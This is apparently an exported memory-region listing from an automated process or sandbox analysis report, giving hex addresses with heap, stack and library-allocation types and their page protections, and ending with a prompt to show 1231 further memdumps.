trusted library allocation
page read and write
7FF886F00000
trusted library allocation
page read and write
1368FCAD000
trusted library allocation
page read and write
136A69B5000
heap
page read and write
136A6CCE000
heap
page read and write
2F7E4FE000
stack
page read and write
177CD0EE000
heap
page read and write
7FF886D30000
trusted library allocation
page read and write
510E000
stack
page read and write
7FF886F14000
trusted library allocation
page read and write
242D05ED000
trusted library allocation
page read and write
7FF887130000
trusted library allocation
page read and write
7FF886D3D000
trusted library allocation
page execute and read and write
1CD33078000
trusted library allocation
page read and write
7FF887043000
trusted library allocation
page read and write
136A6E60000
heap
page read and write
13151000
trusted library allocation
page read and write
242E7DDF000
heap
page read and write
136A6914000
heap
page read and write
7FF886F49000
trusted library allocation
page read and write
5583C79000
stack
page read and write
1CD30380000
trusted library section
page read and write
7FF886D2B000
trusted library allocation
page read and write
1C880000
heap
page read and write
13153000
trusted library allocation
page read and write
177CD000000
trusted library allocation
page read and write
7FF887098000
trusted library allocation
page read and write
7FF886D6C000
trusted library allocation
page execute and read and write
7FF886D2D000
trusted library allocation
page execute and read and write
242E7DD3000
heap
page read and write
D207479000
stack
page read and write
242E7F43000
heap
page read and write
242CF610000
trusted library allocation
page read and write
2251000
trusted library allocation
page read and write
2F7EC3F000
stack
page read and write
1170000
heap
page read and write
D32000
heap
page read and write
1045000
heap
page read and write
242CDD50000
heap
page read and write
55841BF000
stack
page read and write
1368F50E000
trusted library allocation
page read and write
CE5000
heap
page read and write
7FF886EEA000
trusted library allocation
page read and write
121F000
heap
page read and write
242CF87B000
trusted library allocation
page read and write
1CD41DF1000
trusted library allocation
page read and write
7FF886DF6000
trusted library allocation
page execute and read and write
84B1C79000
stack
page read and write
164000
unkown
page readonly
242CF630000
trusted library allocation
page read and write
7FF886E35000
trusted library allocation
page execute and read and write
7FF886D3D000
trusted library allocation
page execute and read and write
1CD33BAE000
trusted library allocation
page read and write
1CD4A377000
heap
page read and write
177E5697000
heap
page execute and read and write
1003000
trusted library allocation
page read and write
2A46000
trusted library allocation
page read and write
7FF886FE0000
trusted library allocation
page read and write
14AF000
stack
page read and write
7FF88707C000
trusted library allocation
page read and write
1CD32D30000
trusted library allocation
page read and write
1BC3E000
stack
page read and write
22C0000
heap
page read and write
5D0000
heap
page read and write
177CB6F8000
heap
page read and write
A40000
heap
page read and write
7FF886EF0000
trusted library allocation
page execute and read and write
1B06F000
stack
page read and write
7FF887040000
trusted library allocation
page read and write
177E58E8000
heap
page read and write
51C000
heap
page read and write
1B54E000
stack
page read and write
7FF886EF0000
trusted library allocation
page execute and read and write
29E8000
trusted library allocation
page read and write
136A69BB000
heap
page read and write
2F7E878000
stack
page read and write
1B076000
heap
page read and write
18811E20000
heap
page read and write
1CD30500000
trusted library allocation
page read and write
177CB6B0000
heap
page read and write
7FF88709C000
trusted library allocation
page read and write
1CD41DD1000
trusted library allocation
page read and write
1070000
heap
page read and write
7C8000
unkown
page readonly
1B67E000
stack
page read and write
7FF887010000
trusted library allocation
page read and write
12253000
trusted library allocation
page read and write
7FF887070000
trusted library allocation
page read and write
177CE4F6000
trusted library allocation
page read and write
242DFAEE000
trusted library allocation
page read and write
1B3AE000
stack
page read and write
D34000
heap
page read and write
177E58B0000
heap
page read and write
1368FD6E000
trusted library allocation
page read and write
177CD479000
trusted library allocation
page read and write
D20858E000
stack
page read and write
7FF886DE0000
trusted library allocation
page read and write
5E1E000
stack
page read and write
C94000
heap
page read and write
12423000
trusted library allocation
page read and write
4EF1000
trusted library allocation
page read and write
2723000
trusted library allocation
page read and write
2240000
heap
page read and write
7FF887063000
trusted library allocation
page read and write
315D000
trusted library allocation
page read and write
177CE256000
trusted library allocation
page read and write
1368E320000
trusted library allocation
page read and write
7FF886F40000
trusted library allocation
page read and write
7FF886D13000
trusted library allocation
page execute and read and write
7FF886D40000
trusted library allocation
page read and write
1CD4A2D0000
heap
page read and write
990000
trusted library allocation
page read and write
242CDFE5000
heap
page read and write
18811E29000
heap
page read and write
7FF886D24000
trusted library allocation
page read and write
7FF887195000
trusted library allocation
page read and write
7FF887050000
trusted library allocation
page read and write
1368E2C0000
heap
page read and write
7FF887060000
trusted library allocation
page read and write
FCE000
stack
page read and write
7FF886E50000
trusted library allocation
page execute and read and write
DB4000
heap
page read and write
2A0E000
trusted library allocation
page read and write
7FF886D4D000
trusted library allocation
page execute and read and write
7FF886D13000
trusted library allocation
page execute and read and write
1C125000
stack
page read and write
1368E300000
trusted library allocation
page read and write
57D000
heap
page read and write
1670000
heap
page read and write
7FF887120000
trusted library allocation
page read and write
1A990000
trusted library allocation
page read and write
1CEB9000
stack
page read and write
1CD420DB000
trusted library allocation
page read and write
177DD556000
trusted library allocation
page read and write
1C55F000
heap
page read and write
136A6D07000
heap
page read and write
7FF886FF0000
trusted library allocation
page read and write
5583FBA000
stack
page read and write
242CDD96000
heap
page read and write
2F7ECBB000
stack
page read and write
7FF886DDC000
trusted library allocation
page execute and read and write
177E5A02000
heap
page read and write
7B5000
heap
page read and write
A30000
heap
page read and write
AF1000
stack
page read and write
242E801F000
heap
page read and write
7FF886EF8000
trusted library allocation
page read and write
177CE9D3000
trusted library allocation
page read and write
7FF886D10000
trusted library allocation
page read and write
1CD33BF3000
trusted library allocation
page read and write
2F7E473000
stack
page read and write
D207678000
stack
page read and write
177CCFA0000
heap
page read and write
640000
heap
page read and write
D2078BE000
stack
page read and write
7FF887160000
trusted library allocation
page read and write
3699000
trusted library allocation
page read and write
5583CFE000
stack
page read and write
5583AFD000
stack
page read and write
242D05B9000
trusted library allocation
page read and write
7FF886ED2000
trusted library allocation
page read and write
7DF4EE7A0000
trusted library allocation
page execute and read and write
242E80AB000
heap
page read and write
1369E661000
trusted library allocation
page read and write
1CD30220000
heap
page read and write
177CD090000
trusted library allocation
page read and write
BA667E000
stack
page read and write
1CD303DB000
heap
page read and write
911000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
7FF887167000
trusted library allocation
page read and write
242CDD75000
heap
page read and write
7FF887136000
trusted library allocation
page read and write
D208609000
stack
page read and write
BA774C000
stack
page read and write
242CF6A0000
trusted library allocation
page read and write
242DF831000
trusted library allocation
page read and write
7FF886FE4000
trusted library allocation
page read and write
7FF886F70000
trusted library allocation
page read and write
177CB72A000
heap
page read and write
242D08BF000
trusted library allocation
page read and write
1CDB8000
stack
page read and write
177CD060000
trusted library allocation
page read and write
7FF886E06000
trusted library allocation
page execute and read and write
25DE000
stack
page read and write
7FF886FC0000
trusted library allocation
page read and write
1368C989000
heap
page read and write
1CD304E0000
heap
page read and write
242D1090000
trusted library allocation
page read and write
177CD0D0000
heap
page read and write
1CD304C0000
trusted library allocation
page read and write
7FF886DF6000
trusted library allocation
page execute and read and write
177CEBA0000
trusted library allocation
page read and write
1580000
heap
page read and write
2A77000
trusted library allocation
page read and write
1CD32822000
trusted library allocation
page read and write
1B440000
heap
page execute and read and write
2745000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page execute and read and write
5DC000
heap
page read and write
1BB1F000
stack
page read and write
1CD303D3000
heap
page read and write
4B08000
trusted library allocation
page read and write
1CD303A2000
heap
page read and write
136A6DD0000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
7FF88710D000
trusted library allocation
page read and write
1CD31CD0000
trusted library allocation
page read and write
7FF886D8C000
trusted library allocation
page execute and read and write
D5E000
heap
page read and write
7FF886DD0000
trusted library allocation
page read and write
558413F000
stack
page read and write
1CD4A640000
heap
page read and write
7FF886DBC000
trusted library allocation
page execute and read and write
242D1602000
trusted library allocation
page read and write
1CD41E44000
trusted library allocation
page read and write
7FF886FA0000
trusted library allocation
page read and write
715000
heap
page read and write
1CD30360000
heap
page read and write
2A5C000
trusted library allocation
page read and write
5080000
trusted library allocation
page execute and read and write
1368C9C3000
heap
page read and write
11E0000
heap
page read and write
1BF0F000
stack
page read and write
177CD020000
trusted library allocation
page read and write
129DD000
trusted library allocation
page read and write
4E0000
heap
page read and write
5583A73000
stack
page read and write
242CF6B0000
heap
page read and write
177E5680000
trusted library allocation
page read and write
BA68FE000
stack
page read and write
18812015000
heap
page read and write
D60000
heap
page read and write
1CD32D39000
trusted library allocation
page read and write
7FF887080000
trusted library allocation
page read and write
177CEADE000
trusted library allocation
page read and write
7FF886F43000
trusted library allocation
page read and write
1368E380000
trusted library allocation
page read and write
505D000
trusted library allocation
page read and write
7FF88709C000
trusted library allocation
page read and write
7FF886FC0000
trusted library allocation
page read and write
5584C0E000
stack
page read and write
1369E441000
trusted library allocation
page read and write
1AD70000
heap
page execute and read and write
7FF887130000
trusted library allocation
page read and write
7FF886F60000
trusted library allocation
page read and write
7FF887043000
trusted library allocation
page read and write
7FF8871A0000
trusted library allocation
page read and write
171000
stack
page read and write
7FF887021000
trusted library allocation
page read and write
2A06000
trusted library allocation
page read and write
1CD4A7A6000
heap
page read and write
242E8008000
heap
page read and write
242E7DCF000
heap
page read and write
7FF886EC2000
trusted library allocation
page read and write
177E58F0000
heap
page read and write
136A6C58000
heap
page read and write
2261000
trusted library allocation
page read and write
644000
heap
page read and write
242D0F84000
trusted library allocation
page read and write
177CD251000
trusted library allocation
page read and write
12258000
trusted library allocation
page read and write
CF0000
heap
page read and write
5584E0C000
stack
page read and write
7FF887089000
trusted library allocation
page read and write
242CF7F5000
heap
page read and write
242E7D06000
heap
page execute and read and write
5583DFD000
stack
page read and write
12A53000
trusted library allocation
page read and write
BA6AF8000
stack
page read and write
D207838000
stack
page read and write
7FF8870B0000
trusted library allocation
page read and write
1CD304E5000
heap
page read and write
7FF887050000
trusted library allocation
page read and write
1D1BC000
stack
page read and write
BA677A000
stack
page read and write
7FF886F60000
trusted library allocation
page read and write
7DF4064A0000
trusted library allocation
page execute and read and write
1B7EE000
stack
page read and write
340000
unkown
page readonly
177CCFD0000
trusted library section
page read and write
611000
heap
page read and write
D207272000
stack
page read and write
FF0000
trusted library allocation
page read and write
177E5A0F000
heap
page read and write
7FF886D40000
trusted library allocation
page read and write
66F000
heap
page read and write
1500000
trusted library allocation
page read and write
7FF886D34000
trusted library allocation
page read and write
242D1069000
trusted library allocation
page read and write
7FF886FA0000
trusted library allocation
page read and write
7FF887040000
trusted library allocation
page read and write
242E7DCB000
heap
page read and write
7FF886E30000
trusted library allocation
page execute and read and write
1CD30480000
heap
page read and write
1218000
heap
page read and write
7FF887090000
trusted library allocation
page read and write
B50000
heap
page read and write
272F000
trusted library allocation
page read and write
246E000
stack
page read and write
7FF887150000
trusted library allocation
page read and write
242D1627000
trusted library allocation
page read and write
C50000
heap
page read and write
121C000
heap
page read and write
7FF886F30000
trusted library allocation
page read and write
1BE0F000
stack
page read and write
D2073FE000
stack
page read and write
242DFAF8000
trusted library allocation
page read and write
177CD0D5000
heap
page read and write
242E80B1000
heap
page read and write
EC0000
heap
page read and write
242DFAF6000
trusted library allocation
page read and write
7FF886F80000
trusted library allocation
page read and write
7DF4A5450000
trusted library allocation
page execute and read and write
177CDCA3000
trusted library allocation
page read and write
7FF88711C000
trusted library allocation
page read and write
7FF886F90000
trusted library allocation
page read and write
242DF810000
trusted library allocation
page read and write
7FF886DE6000
trusted library allocation
page read and write
970000
trusted library allocation
page read and write
177E56FA000
heap
page read and write
7FF886D20000
trusted library allocation
page read and write
740000
trusted library allocation
page read and write
F4E000
stack
page read and write
1BF2D000
stack
page read and write
7FF886FD0000
trusted library allocation
page read and write
177CE429000
trusted library allocation
page read and write
242CF620000
heap
page readonly
7FF887078000
trusted library allocation
page read and write
1CD3363A000
trusted library allocation
page read and write
1CCBA000
stack
page read and write
2F7F88C000
stack
page read and write
7FF887190000
trusted library allocation
page read and write
7FF886F18000
trusted library allocation
page read and write
4FC0000
trusted library allocation
page read and write
5584E8E000
stack
page read and write
4E8000
heap
page read and write
7FF886F80000
trusted library allocation
page read and write
84B1D7F000
stack
page read and write
7FF887080000
trusted library allocation
page read and write
7FF886F70000
trusted library allocation
page read and write
7FF886D24000
trusted library allocation
page read and write
1585000
heap
page read and write
7FF886D20000
trusted library allocation
page read and write
1CD4A713000
heap
page read and write
7FF886F80000
trusted library allocation
page read and write
225D000
trusted library allocation
page read and write
177E5690000
heap
page execute and read and write
7FF886F00000
trusted library allocation
page execute and read and write
7FF887190000
trusted library allocation
page read and write
1CD31FF9000
trusted library allocation
page read and write
240B000
trusted library allocation
page execute and read and write
1368F024000
trusted library allocation
page read and write
7FF886EA0000
trusted library allocation
page read and write
667000
heap
page read and write
7FF886EF2000
trusted library allocation
page read and write
1368C981000
heap
page read and write
E50000
heap
page read and write
1B82E000
stack
page read and write
1B3B0000
heap
page execute and read and write
7FF886E40000
trusted library allocation
page execute and read and write
7FF887072000
trusted library allocation
page read and write
7FF8870A0000
trusted library allocation
page read and write
7FF886D8C000
trusted library allocation
page execute and read and write
4F0E000
trusted library allocation
page read and write
242CF7F0000
heap
page read and write
7FF886DF6000
trusted library allocation
page execute and read and write
1CD32D45000
trusted library allocation
page read and write
177CE30F000
trusted library allocation
page read and write
29CE000
trusted library allocation
page read and write
1AC00000
heap
page read and write
2910000
heap
page read and write
177CF071000
trusted library allocation
page read and write
1369E70E000
trusted library allocation
page read and write
7FF8870C0000
trusted library allocation
page read and write
7FF88707C000
trusted library allocation
page read and write
1369E728000
trusted library allocation
page read and write
2AB5000
trusted library allocation
page read and write
7FF886DEC000
trusted library allocation
page execute and read and write
7FF886F40000
trusted library allocation
page read and write
7FF886F00000
trusted library allocation
page execute and read and write
D2072FE000
stack
page read and write
242E7F10000
heap
page read and write
7FF886F40000
trusted library allocation
page read and write
1368FD10000
trusted library allocation
page read and write
7FF886EC4000
trusted library allocation
page read and write
12A58000
trusted library allocation
page read and write
1CD4A78D000
heap
page read and write
1368F387000
trusted library allocation
page read and write
5040000
trusted library allocation
page read and write
242CDD00000
heap
page read and write
177E58B4000
heap
page read and write
1ACA0000
heap
page read and write
1CD33BD3000
trusted library allocation
page read and write
7FF887000000
trusted library allocation
page read and write
1368F7E1000
trusted library allocation
page read and write
7FF886D2D000
trusted library allocation
page execute and read and write
7FF887010000
trusted library allocation
page read and write
7FF887083000
trusted library allocation
page read and write
11A0000
heap
page read and write
7FF886D34000
trusted library allocation
page read and write
4DDE000
stack
page read and write
1CD30525000
heap
page read and write
D20850D000
stack
page read and write
1CD30398000
heap
page read and write
7FF887150000
trusted library allocation
page execute and read and write
1CD3048B000
heap
page read and write
2680000
heap
page execute and read and write
242E7F50000
heap
page read and write
1CD30300000
heap
page read and write
1CD31E57000
trusted library allocation
page read and write
1CD4A30B000
heap
page read and write
C20000
heap
page read and write
177DD281000
trusted library allocation
page read and write
2FAE000
stack
page read and write
7FF887020000
trusted library allocation
page read and write
7FF887183000
trusted library allocation
page read and write
7FF886F90000
trusted library allocation
page read and write
177CE2B3000
trusted library allocation
page read and write
7FF886DE6000
trusted library allocation
page execute and read and write
9AD000
heap
page read and write
1CD31D00000
trusted library allocation
page read and write
7FF886F60000
trusted library allocation
page read and write
7FF886FC0000
trusted library allocation
page read and write
1368CA08000
heap
page read and write
7FF886FD7000
trusted library allocation
page read and write
177E5A09000
heap
page read and write
177CCFE0000
trusted library allocation
page read and write
1CD420BD000
trusted library allocation
page read and write
2691000
trusted library allocation
page read and write
1700000
heap
page read and write
7FF887040000
trusted library allocation
page read and write
7B0000
heap
page read and write
BA6B7E000
stack
page read and write
7FF886EE1000
trusted library allocation
page read and write
1368C8E0000
heap
page read and write
7FF886E40000
trusted library allocation
page execute and read and write
7FF886F00000
trusted library allocation
page execute and read and write
1C77E000
stack
page read and write
177DD544000
trusted library allocation
page read and write
2F7E679000
stack
page read and write
242E809D000
heap
page read and write
23F6000
trusted library allocation
page execute and read and write
7FF887092000
trusted library allocation
page read and write
242CDFE0000
heap
page read and write
1368F4DC000
trusted library allocation
page read and write
242E7DC7000
heap
page read and write
7DF406490000
trusted library allocation
page execute and read and write
177E5771000
heap
page read and write
1368C987000
heap
page read and write
1368E410000
heap
page execute and read and write
A1D000
trusted library allocation
page execute and read and write
7FF886D3D000
trusted library allocation
page execute and read and write
6F0000
heap
page read and write
1CD30416000
heap
page read and write
7FF886ECA000
trusted library allocation
page read and write
228E000
stack
page read and write
2F7EABE000
stack
page read and write
BA77CB000
stack
page read and write
136A6AA0000
heap
page read and write
177CE372000
trusted library allocation
page read and write
1C0000
heap
page read and write
1368C98B000
heap
page read and write
7FF887030000
trusted library allocation
page read and write
242CDD62000
heap
page read and write
1CD4A701000
heap
page read and write
7FF886ECA000
trusted library allocation
page read and write
7FF886D12000
trusted library allocation
page read and write
1369E490000
trusted library allocation
page read and write
177CB73B000
heap
page read and write
7FF886DD6000
trusted library allocation
page read and write
177CF051000
trusted library allocation
page read and write
242D0253000
trusted library allocation
page read and write
242E7D10000
heap
page read and write
7FF886D7C000
trusted library allocation
page execute and read and write
1CD33195000
trusted library allocation
page read and write
7FF886D2D000
trusted library allocation
page execute and read and write
1247000
heap
page read and write
177E58A4000
heap
page read and write
242CF750000
heap
page execute and read and write
7FF886D14000
trusted library allocation
page read and write
177DD546000
trusted library allocation
page read and write
7FF886E16000
trusted library allocation
page execute and read and write
7FF4FAF00000
trusted library allocation
page execute and read and write
1368F398000
trusted library allocation
page read and write
7FF886EF4000
trusted library allocation
page read and write
7FF886ED0000
trusted library allocation
page execute and read and write
7FF887063000
trusted library allocation
page read and write
136A6A07000
heap
page execute and read and write
CBE000
heap
page read and write
7FF8870B0000
trusted library allocation
page read and write
54BE000
stack
page read and write
2A2D000
trusted library allocation
page read and write
7FF886F20000
trusted library allocation
page execute and read and write
D20870E000
stack
page read and write
177DD62B000
trusted library allocation
page read and write
760000
trusted library allocation
page read and write
5583BFE000
stack
page read and write
D2A000
heap
page read and write
1CD32FAA000
trusted library allocation
page read and write
51A000
heap
page read and write
63E000
heap
page read and write
4F60000
trusted library allocation
page read and write
6F0000
heap
page read and write
7FF886FD0000
trusted library allocation
page read and write
7FF886EB0000
trusted library allocation
page read and write
177CF02C000
trusted library allocation
page read and write
7DF4A5440000
trusted library allocation
page execute and read and write
242DF821000
trusted library allocation
page read and write
7FF886D23000
trusted library allocation
page execute and read and write
1B5EE000
stack
page read and write
7FF886DE0000
trusted library allocation
page read and write
1368C97C000
heap
page read and write
1CD33722000
trusted library allocation
page read and write
136A694A000
heap
page read and write
7FF886FF1000
trusted library allocation
page read and write
7FF886DCC000
trusted library allocation
page execute and read and write
3EC000
stack
page read and write
5070000
trusted library allocation
page read and write
CFC000
heap
page read and write
177DD4CA000
trusted library allocation
page read and write
242E7FC5000
heap
page read and write
1CD304D0000
heap
page execute and read and write
136A6B80000
heap
page execute and read and write
BA638E000
stack
page read and write
2F7EB3E000
stack
page read and write
2A40000
heap
page execute and read and write
678000
heap
page read and write
2F7F88E000
stack
page read and write
1BD2E000
stack
page read and write
5060000
trusted library allocation
page read and write
66D000
heap
page read and write
548000
heap
page read and write
7FF886D30000
trusted library allocation
page read and write
177DD271000
trusted library allocation
page read and write
7FF886D14000
trusted library allocation
page read and write
1075000
heap
page read and write
177CE0E0000
trusted library allocation
page read and write
C50000
heap
page read and write
4EE0000
trusted library allocation
page read and write
7FF886D12000
trusted library allocation
page read and write
508000
heap
page read and write
2F7E7FD000
stack
page read and write
7FF886FA0000
trusted library allocation
page read and write
1368C900000
heap
page read and write
1368C99D000
heap
page read and write
242CDD8D000
heap
page read and write
A14000
trusted library allocation
page read and write
2405000
trusted library allocation
page execute and read and write
510000
heap
page read and write
4B0A000
trusted library allocation
page read and write
1CD32D4E000
trusted library allocation
page read and write
E90000
trusted library allocation
page read and write
1368F5F7000
trusted library allocation
page read and write
23F2000
trusted library allocation
page read and write
1C540000
heap
page read and write
1CBBE000
stack
page read and write
7FF887064000
trusted library allocation
page read and write
120F000
heap
page read and write
7FF886F14000
trusted library allocation
page read and write
7FF886F55000
trusted library allocation
page read and write
4AD0000
heap
page read and write
7FF886D0D000
trusted library allocation
page execute and read and write
4EEB000
trusted library allocation
page read and write
1205000
heap
page read and write
E4E000
stack
page read and write
7FF887069000
trusted library allocation
page read and write
7FF886D14000
trusted library allocation
page read and write
1C530000
heap
page read and write
1CD336C3000
trusted library allocation
page read and write
C91000
heap
page read and write
7FF887090000
trusted library allocation
page read and write
1CD303EF000
heap
page read and write
1000000
trusted library allocation
page read and write
177CB690000
heap
page read and write
D2079BE000
stack
page read and write
84B1CFF000
unkown
page read and write
7FF886D5C000
trusted library allocation
page execute and read and write
5583EBF000
stack
page read and write
1368E421000
trusted library allocation
page read and write
1368F39C000
trusted library allocation
page read and write
C85000
heap
page read and write
1CD4A4D0000
heap
page execute and read and write
1CD4A6E8000
heap
page read and write
A2D000
trusted library allocation
page execute and read and write
7FF886D30000
trusted library allocation
page read and write
242CDDD6000
heap
page read and write
1180000
heap
page read and write
D38000
heap
page read and write
12251000
trusted library allocation
page read and write
5FE000
heap
page read and write
242E8065000
heap
page read and write
7FF886D20000
trusted library allocation
page read and write
242E7E10000
heap
page read and write
177E5AC0000
heap
page read and write
7FF886D13000
trusted library allocation
page execute and read and write
1CD33BF8000
trusted library allocation
page read and write
D207A3C000
stack
page read and write
5E54000
heap
page read and write
7F7B0000
trusted library allocation
page execute and read and write
BA66FE000
stack
page read and write
7FF886EB0000
trusted library allocation
page read and write
177CEA3F000
trusted library allocation
page read and write
1CD49DDE000
heap
page read and write
7FF886FB0000
trusted library allocation
page read and write
5583F37000
stack
page read and write
13690220000
trusted library allocation
page read and write
7FF88716D000
trusted library allocation
page read and write
1AE5D000
stack
page read and write
1CD31DC0000
heap
page read and write
A20000
trusted library allocation
page read and write
1369E709000
trusted library allocation
page read and write
1369E710000
trusted library allocation
page read and write
7FF887072000
trusted library allocation
page read and write
1AF6E000
stack
page read and write
242CDD92000
heap
page read and write
F80000
heap
page read and write
1B64E000
stack
page read and write
242E7FE7000
heap
page read and write
1CD330D8000
trusted library allocation
page read and write
7FF887089000
trusted library allocation
page read and write
2729000
trusted library allocation
page read and write
1368C985000
heap
page read and write
1B56B000
stack
page read and write
7FF887160000
trusted library allocation
page read and write
7FF886E16000
trusted library allocation
page execute and read and write
C30000
heap
page read and write
242D0922000
trusted library allocation
page read and write
7FF886D40000
trusted library allocation
page read and write
A13000
trusted library allocation
page execute and read and write
1CD303D1000
heap
page read and write
50CE000
stack
page read and write
7FF886EB2000
trusted library allocation
page read and write
18811D10000
heap
page read and write
18811DF0000
heap
page read and write
242D0834000
trusted library allocation
page read and write
7FF88716E000
trusted library allocation
page read and write
13690245000
trusted library allocation
page read and write
242E7D56000
heap
page read and write
2407000
trusted library allocation
page execute and read and write
7FF886D30000
trusted library allocation
page read and write
478E000
stack
page read and write
177E5702000
heap
page read and write
242CDCA0000
heap
page read and write
7FF886D4B000
trusted library allocation
page read and write
1A89C000
stack
page read and write
7FF886EF8000
trusted library allocation
page read and write
81E000
stack
page read and write
D1E000
heap
page read and write
1CD3041A000
heap
page read and write
7FF886F10000
trusted library allocation
page read and write
2421000
trusted library allocation
page read and write
273C000
trusted library allocation
page read and write
12421000
trusted library allocation
page read and write
3040000
heap
page execute and read and write
904000
heap
page read and write
1368EE72000
trusted library allocation
page read and write
1B070000
heap
page read and write
1CD4A322000
heap
page read and write
1369E718000
trusted library allocation
page read and write
1CD32E90000
trusted library allocation
page read and write
CE0000
heap
page read and write
1368E649000
trusted library allocation
page read and write
1D2BD000
stack
page read and write
242E7F40000
heap
page read and write
24B0000
trusted library allocation
page execute and read and write
7FF886FF5000
trusted library allocation
page read and write
242DFB08000
trusted library allocation
page read and write
2AC0000
trusted library allocation
page read and write
7FF886EE0000
trusted library allocation
page execute and read and write
BA6977000
stack
page read and write
3691000
trusted library allocation
page read and write
242E7F77000
heap
page read and write
7FF887120000
trusted library allocation
page read and write
BA794E000
stack
page read and write
7FF887098000
trusted library allocation
page read and write
BA7849000
stack
page read and write
7FF886F00000
trusted library allocation
page execute and read and write
1C223000
stack
page read and write
177CB5B0000
heap
page read and write
7FF886D04000
trusted library allocation
page read and write
1368C940000
heap
page read and write
1CD329DF000
trusted library allocation
page read and write
780000
unkown
page readonly
242E7FAD000
heap
page read and write
7FF887166000
trusted library allocation
page read and write
DE7000
heap
page read and write
177CE557000
trusted library allocation
page read and write
2F7EBBD000
stack
page read and write
242D0808000
trusted library allocation
page read and write
2F7E937000
stack
page read and write
1368C983000
heap
page read and write
136901FB000
trusted library allocation
page read and write
505A000
trusted library allocation
page read and write
177E5909000
heap
page read and write
29D4000
trusted library allocation
page read and write
5110000
trusted library allocation
page execute and read and write
7FF887140000
trusted library allocation
page read and write
1368C9C5000
heap
page read and write
D30000
heap
page read and write
2AC2000
trusted library allocation
page read and write
3161000
trusted library allocation
page read and write
242CDD40000
trusted library allocation
page read and write
177CB6F0000
heap
page read and write
5584038000
stack
page read and write
7FF887103000
trusted library allocation
page read and write
242E7CB0000
trusted library allocation
page read and write
7FF887150000
trusted library allocation
page execute and read and write
8D8000
heap
page read and write
2F7EA39000
stack
page read and write
2AA3000
trusted library allocation
page read and write
7FF886EB5000
trusted library allocation
page read and write
7FF887140000
trusted library allocation
page execute and read and write
242D07A3000
trusted library allocation
page read and write
7FF886DC0000
trusted library allocation
page read and write
7FF886D33000
trusted library allocation
page execute and read and write
2F7E5FE000
stack
page read and write
7FF886EB2000
trusted library allocation
page read and write
7FF886DB0000
trusted library allocation
page read and write
BA6C7E000
stack
page read and write
7FF886DC0000
trusted library allocation
page read and write
1CD4A630000
heap
page read and write
7FF886DE6000
trusted library allocation
page read and write
177DD53C000
trusted library allocation
page read and write
242CFCCD000
trusted library allocation
page read and write
1368C8D0000
heap
page read and write
7FF88709A000
trusted library allocation
page read and write
177CB704000
heap
page read and write
177CB739000
heap
page read and write
242CF801000
trusted library allocation
page read and write
D207577000
stack
page read and write
7FF886D33000
trusted library allocation
page execute and read and write
7FF886FE0000
trusted library allocation
page read and write
1CD33554000
trusted library allocation
page read and write
7FF886E50000
trusted library allocation
page execute and read and write
7FF886D32000
trusted library allocation
page read and write
1368C935000
heap
page read and write
136A6CF3000
heap
page read and write
1368E330000
heap
page read and write
5584D0E000
stack
page read and write
7FF886D50000
trusted library allocation
page read and write
7FF886D2D000
trusted library allocation
page execute and read and write
242D0AA4000
trusted library allocation
page read and write
136A6BB0000
heap
page read and write
BA6BFF000
stack
page read and write
1B6EE000
stack
page read and write
7FF887000000
trusted library allocation
page read and write
5D6000
heap
page read and write
750000
heap
page read and write
There are 1231 hidden memdumps, click here to show them.